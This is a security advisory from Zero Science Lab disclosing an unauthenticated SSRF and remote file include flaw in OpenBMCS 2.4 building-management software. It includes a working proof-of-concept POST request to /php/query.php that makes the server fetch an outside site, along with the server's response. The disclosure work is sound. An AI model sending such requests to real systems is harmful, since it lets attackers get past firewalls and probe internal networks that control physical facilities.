OpenBMCS 2.4 Unauthenticated SSRF / RFI Vendor: OPEN BMCS Product web page: https://www.openbmcs.com Affected version: 2.4 Summary: Building Management & Controls System (BMCS). No matter what the size of your business, the OpenBMCS software has the ability to expand to hundreds of controllers. Our product can control and monitor anything from a garage door to a complete campus wide network, with everything you need on board. Desc: Unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include (RFI) vulnerability exists in OpenBMCS within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application, allows hijacking the current session of the user, execute cross-site scripting code or changing the look of the page and content modification on current display. Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) Apache/2.4.41 (Ubuntu) Apache/2.4.25 (Debian) nginx/1.16.1 PHP/7.4.3 PHP/7.0.33-0+deb9u9 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5694 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5694.php 26.10.2021 -- POST /php/query.php HTTP/1.1 Host: 192.168.1.222 Content-Length: 29 Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://192.168.1.222 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://192.168.1.222/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ip=www.columbia.edu:80&argu=/ HTTP/1.1 302 Found Date: Tue, 14 Dec 2021 20:26:47 GMT Server: Apache/2.4.41 (Ubuntu) Set-Cookie: PHPSESSID=gktecb9mjv4gp1moo7bg3oovs3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: ../login.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 32141 Columbia University in the City of New York ... ...